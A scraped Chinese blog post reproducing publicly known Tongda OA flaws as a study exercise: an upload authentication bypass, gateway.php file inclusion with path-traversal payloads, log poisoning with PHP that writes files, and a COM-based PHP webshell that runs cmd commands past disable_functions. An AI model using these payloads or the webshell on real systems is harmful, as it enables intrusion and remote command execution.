石家庄做网站最好的公司哪家好公司网站模板

pingmian/2025/10/9 8:18:44/文章来源:
石家庄做网站最好的公司哪家好,公司网站模板,做旅游网站的开题报告,平乡网站建设说明通达OA漏洞在去年上半年已爆出#xff0c;这不趁着周末没事做#xff0c;将源码下载下来进行复现学习。文件包含测试文件包含检测#xff0c;payload1:ip/ispirit/interface/gateway.php?json{url:/general/../../mysql5/my.ini}利用文件包含访…说明通达OA漏洞在去年上半年已爆出这不趁着周末没事做将源码下载下来进行复现学习。文件包含测试文件包含检测payload1:ip/ispirit/interface/gateway.php?json{url:/general/../../mysql5/my.ini}利用文件包含访问mysql.ini,检查是否有某些特定字符串 比如innodb_log_group_home_dirpayload2:ip/ispirit/interface/gateway.php?json{}url/general/../../nginx/logs/oa.access.log利用文件包含访问OA日志复现源码下载链接https://pan.baidu.com/s/1HP5pDsAK2QLOWpnB1JX-Yg提取码vab0是个exe安装解压完是php代码。用Sublime打开都是16进制加密用notepad打开显示zend加密php在线解密网站:http://dezend.qiling.org/free.html解密出源代码。文件上传ispirit/im/upload.php要上传首先需要绕过登陆验证在本系统中auth.php是登陆验证的相关逻辑但在upload.php未修复前如果$P非空就不需要经过auth.php验证即可执行后续代码。利用此处逻辑漏洞可绕过登陆验证直接上传文件。经过下载源码测试上传后的文件在MYOA/attach/im/2003/目录下。因上传后的文件不在根目录所以无法直接利用因此需要进行文件包含。文件包含与上传相反这里不传P参数就可以文件包含。未修复前可通过精心构造json进入47行的includ_once进行文件包含。官方在补丁中过滤了 防止用户读取其他目录文件。POCpoc有很多其一首先构造url并访问在日志中写入一句话原理是OA默认会将访问urlagent写日志。/ispirit/interface/gateway.php?json{}a?php  file_put_contents(1.php,hello123);?先在浏览器访问发现用burp重新发包。成功写入日志。(写日志的方式省去了上传)文件包含如果php poc 为?php file_put_contents(1.php,hello123);?则上传到 存在漏洞文件 gateway.php 同级目录如果php poc为?php file_put_contents(../1.php,hello123);?,则上传到 上一级目录 ispirit 目录下。注意路径。exp通过 upload.php 上传一个文件可自定义后缀名。经过下载源码测试上传后的文件在MYOA/attach/im/2003/目录下。思路一上传一个写shell的php文件在利用文件包含写shell。具体见exp.py。思路二执行cmd,MYOA/bin/ 目录下的 php.ini 禁用了一些执行命令的函数。disable_functions  exec,shell_exec,system,passthru,proc_open,show_source,phpinfodisable_classes 参考使用com组件绕过disable_functionshttps://www.cnblogs.com/-qing-/p/10944118.htmleg:?php $command$_GET[a];$wsh new COM(WScript.shell); // 生成一个COM对象 Shell.Application也能$exec $wsh-exec(cmd /c.$command); //调用对象方法来执行命令$stdout $exec-StdOut();$stroutput $stdout-ReadAll();echo $stroutput;?这里写的exp总是将post数据自动url编码。达不到burp的效果。需要先设置一次请求头setHeader(Content-Type, application/x-www-form-urlencoded)再将数据拼接成string格式再进行发送 终于写成了exp2.py。版本路径不同环境路径不同。例如2013/ispirit/im/upload.php/ispirit/interface/gateway.php例如2017/ispirit/im/upload.php/mac/gateway.php后记一些趣事正常该用post包含的。get包含就很玄学了。正常get请求(不空行)是不行的,在浏览器GET请求也是不能包含的。注意看我光标位置。必须空出来一行否则不成功。get无请求体不知道是什么原因。空两行试试发包Content-Length都有了可真牛啊。wireshark抓个包,get没请求体呀。见strange-get-include.pcap。往期精彩感兴趣的可以点个关注 关注「安全先师」把握前沿安全脉搏

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/pingmian/90392.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

网站seo新手服装设计就业前景

转自:http://www.linuxso.com/command/fsck.html 使用权限 : 超级使用者    使用方式 : fsck [-sACVRP] [-t fstype] [--] [fsck-options] filesys [...]    说明 : 在Linux系统中,为了增加系统性能,通常系统默认一些数据…

特性设计的网站中国建设银行网站公积金查询余额

目录 一、BP神经网络简介 1.1 什么是BP神经网络 1.2 BP神经网络的结构 二、BP神经网络的前馈与后馈 2.1 什么是BP神经网络的前馈 2.2 什么是BP神经网络的后馈 三、BP神经网络前馈与后馈的关系 3.1 BP神经网络前馈与后馈的区别 3.2 BP神经网络前馈与后馈的意义 四、BP…

全校网站建设与管理店铺设计属于什么设计

为什么不用HAL库,使用HAL库捕获输入一个通道还尚可,多通道捕获由于HAL的回调函数不符合我的要求,干脆直接切换到LL库。网上找了许多,代码处理写的不符合我的要求,这里记录一下我的调试过程。 TIM2输出1路PWM信号&#…

网站子目录怎么做反向代理设置wordpress字体大小

文章目录 Servlet概述快速入门Servlet 中方法的生命周期Servlet 的体系结构GenericServletHttpServlet Servlet 3.0以后Servlet 相关配置 案例Servlet xml配置web.xmlMyServlet Servlet 注解配置 Servlet 概述 Servlet applet 运行在服务器端的小程序,Servlet 就是…

做网站应该注意些什么青岛响应式网站设计

联合体的定义 联合体的定义和结构体相同。 联合体成员共用存储空间,联合体占用的空间最大长度的数据成员的长度。 union State {char sleep;char run;int suspend;double error; }state_u;以上例子,State表示联合体的名字,它相当于声明了一…

金溪网站建设推广清城网站seo

ubuntu克隆打不开 复制的存有ubuntu克隆的文件夹,导入vmware打不开 说找不到这个文件,那就到目录把它的删掉 的删掉 换000001.vmdk后缀的

找人做效果图去什么网站家政服务公司网站建设方案策划书

队列(queue)是一种遵循先入先出规则的线性数据结构。顾名思义,队列模拟了排队现象,即新来的人不断加入队列的尾部,而位于队列头部的人逐个离开。 如下图所示,我们将队列的头部称为“队首”,尾部称为“队尾”&#xff…

玉林市住房和城乡建设厅网站wordpress 最新文章

EndNoter mac是一款参考文献管理软件,旨在帮助学术研究者、学生和专业人士有效地管理和引用参考文献。该软件提供了许多功能,使用户可以轻松地组织、搜索和引用各种类型的文献。 EndNoter mac软件特点和功能 1. 参考文献管理:EndNoter允许用…

公众号和网站先做哪个拼多多代运营公司十大排名

在Android笔记(二十二):Paging3分页加载库结合Compose的实现网络单一数据源访问一文中,实现了单一数据源的访问。在实际运行中,往往希望不是单纯地访问网络数据,更希望将访问的网络数据保存到移动终端的SQL…

建立购物网站 app网赌网站建设多少钱

此系统设计主要采用的是python语言来进行开发,采用django/flask框架技术,框架分为三层,分别是控制层Controller,业务处理层Service,持久层dao,能够采用多层次管理开发,对于各个模块设计制作有一…

做推广要知道的网站万能网页视频下载器

/************************************************************FileName: getini.h // 文件名称Author: yuanfen127 // 作者Date: 2005-03-31 // 日期Description: // 描述本文件的内容,功能,内部各部分之间的关系// 以及文本文件与…

湖南高端网站制作公司建筑招投标网官网

1.常用函数介绍 0 设备准备 device torch.device("cuda:0" if torch.cuda.is_available() else "cpu")这行代码是用来选择设备的,根据是否有可用的 CUDA 设备来选择使用 GPU 还是 CPU 进行计算。 更详细的解释如下: torch.cuda.…

html5商城网站开发做器材的网站

Javascript语言用于编码的函数,一共有三个,最古老的一个就是escape()。虽然这个函数现在已经不提倡使用了,但是由于历史原因,很多地方还在使用它,所以有必要先从它讲起。 escape 和 unescape 实际上,esca…

网站开发入门培训机构wordpress中文相册插件下载

前言: 谈到“架构”这两个字,会有好多的名词闪现,比如:分层架构、事件驱动架构、DDD、CQRS等。亦或者一堆的软件设计原则,如:KISS原则(Keep it Simple and Stupid)、SOLID原则(单一责任原则、开…

建设新网站wordpress点击图片上传

🚀🚀🚀本文改进:一种极简的神经网络模型 VanillaNet,支持vanillanet_5, vanillanet_6, vanillanet_7, vanillanet_8, vanillanet_9, vanillanet_10, vanillanet_11等版本 🚀🚀🚀YOLOv8改进专栏:http://t.csdnimg.cn/hGhVK 学姐带你学习YOLOv8,从入门到创新,…

网站设计入门杭州盘石做网站专业吗

如果可以使用以下操作从一个字符串得到另一个字符串,则认为两个字符串 接近 : 操作 1:交换任意两个 现有 字符。 例如,abcde -> aecdb操作 2:将一个 现有 字符的每次出现转换为另一个 现有 字符,并对另…

正规品牌网站设计推荐做网站开发哪里可以接单

背景: 专栏取名为DICOM医学图像处理原因是:博主是从医学图像处理算法研究时开始接触DICOM协议的。当初认识有局限性,认为DICOM只是一个简单的文件格式约定,简而言之,我当时认为DICOM协议就是扩展名为DCM文件的格式说明…

郑州外贸网站建设公司专门下软件的app

目录 实验条件网络拓朴需求 配置实现1. 配置PC1~3, DHCP_Server的vlan2. VLAN10、20的网关为MSW1对应的SVI,VLAN30、40的网关为MSW2对应的SVI;3. 配置5台交换机之间线路均为Trunk4. 配置5台交换机均启用Rapid-PVST(RSTP)5. 配置DHCP Server,创…

傻瓜自助建站软件产品推广渠道有哪些

互联网的发展,的确方便了现代人生活。视频电话、出去买东西你都不用带钱带卡,手机一扫就可以完成支付。很多中小学的家长都会建一个家长群,方便老师和家长的沟通。这个群可以说是家长和学校的桥梁和纽带,家长们为了支持老师的工作…

镇江房地产网站建设网站策划模板

单例模式(Singleton):指在一个系统中某个类只存在一个实例,类中自行实例化,实例向该系统提供统一的访问接口。 单例模式有两种表现形式,饿汉式:类加载时,就进行实例化;懒…